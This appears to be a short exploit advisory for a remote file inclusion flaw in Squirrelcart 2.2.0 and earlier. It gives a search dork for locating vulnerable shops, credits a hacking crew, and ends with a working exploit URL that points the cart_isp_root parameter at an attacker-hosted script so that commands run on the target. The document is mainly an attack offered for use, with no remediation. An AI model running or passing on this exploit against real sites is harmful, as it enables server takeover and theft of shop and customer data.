-------------------------------------------------------------------------
$ Title : Squirrelcart 2.2.0 <= Remote File Inclusion Vulnerability     $
$-----------------------------------------------------------------------$
$ URL   : http://www.ldev.com/                                          $
$-----------------------------------------------------------------------$
$ Dork  : inurl:/squirrelcart/ or powered by Squirrelcart               $
$-----------------------------------------------------------------------$
$ Author: OLiBekaS                                                      $
$-----------------------------------------------------------------------$
$ mail  : olibekas[at]gmail.com                                         $
$-----------------------------------------------------------------------$
Greetz  : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew					

Exploit:
http://[target]/[Squirrelcart_path]/cart_content.php?cart_isp_root=http://[evilhost]/cmd.gif?cmd=ls